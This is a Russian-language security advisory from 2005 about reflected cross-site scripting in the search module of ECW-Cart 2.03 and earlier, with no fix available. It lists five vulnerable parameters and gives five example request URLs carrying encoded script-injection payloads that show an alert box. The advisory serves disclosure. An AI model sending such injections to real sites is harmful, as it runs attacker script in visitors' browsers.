Межсайтовый скриптинг в модуле поиска в ECW-Cart

Дата публикации:
19.12.2005
Всего просмотров:
1151
Опасность:
Низкая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
ECW-Cart 2.x
Уязвимые версии: ECW-Cart 2.03 и более ранние версии

Описание:
Удаленный пользователь может произвести XSS нападение.

Уязвимость существует из-за недостаточной обработки входных данных в параметрах "kword", "max", "min", "comp" и "f". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный HTML код в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

/index.cgi?c=search&s=ok&id=191&kword=
%22%3E%3Cscript%3Ealert%28%27r0t%27%29
%3C%2Fscript%3E&f=r0t+XSS&comp=0&min=&max=

/index.cgi?c=search&s=ok&id=191&kword=
&f=r0t+XSS&comp=0&min=&max=%22%3E%3Csc
ript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E

/index.cgi?c=search&s=ok&id=191&kword=
&f=r0t+XSS&comp=0&min=%22%3E%3Cscript%
3Ealert%28%27r0t%27%29%3C%2Fscript%3E

/index.cgi?c=search&s=ok&id=191&kword=
&f=r0t+XSS&comp=%22%3E%3Cscript%3Ealert
%28%27r0t%27%29%3C%2Fscript%3E

/index.cgi?c=search&s=ok&id=191&kword=
&f=%22%3E%3Cscript%3Ealert%28%27r0t%27
%29%3C%2Fscript%3E

URL производителя: www.soft4e.com/cart.html

Решение: Способов устранения уязвимости не существует в настоящее время.

Источник:

Ссылки: ECW-Cart XSS vuln.

или введите имя

CAPTCHA